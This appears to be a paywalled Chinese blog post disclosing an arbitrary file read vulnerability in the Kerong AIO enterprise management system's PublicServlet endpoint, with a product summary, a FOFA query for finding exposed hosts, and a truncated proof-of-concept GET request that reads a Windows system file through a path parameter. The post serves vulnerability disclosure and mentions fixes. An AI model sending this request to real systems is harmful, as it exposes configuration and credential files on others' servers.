超级会员免费看
本文介绍了科荣AIO企业一体化管理解决方案中的PublicServlet存在任意文件读取漏洞,攻击者能通过该漏洞读取系统关键文件,导致安全风险。文中详细阐述了漏洞概述、复现环境,并提供了PoC,同时给出了修复建议,包括限制接口访问权限和升级到安全版本。
0x01 产品简介
科荣AIO 企业⼀体化管理解决⽅案 通过ERPERP(进销存财务)、OAOA(办公⾃动化)、CRMCRM(客⼾关系管理)、UDPUDP(⾃定义平台),集电⼦商务平台、⽀付平台、ERP 平台、微信平台、移动APP 等解决了众多企业客⼾在管理过程中跨部⻔、多功能、需求多变等通⽤及个性化的问题。
0x02 漏洞概述
科荣AIO PublicServlet 接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 复现环境
FOFA:body="changeAccount('8000')"
0x04 漏洞复现
PoC
GET /PublicServlet?operation=downLoadFiles&path=C:/WIndows/win.ini&pho= HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT
订阅专栏 解锁全文
扫一扫
947
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
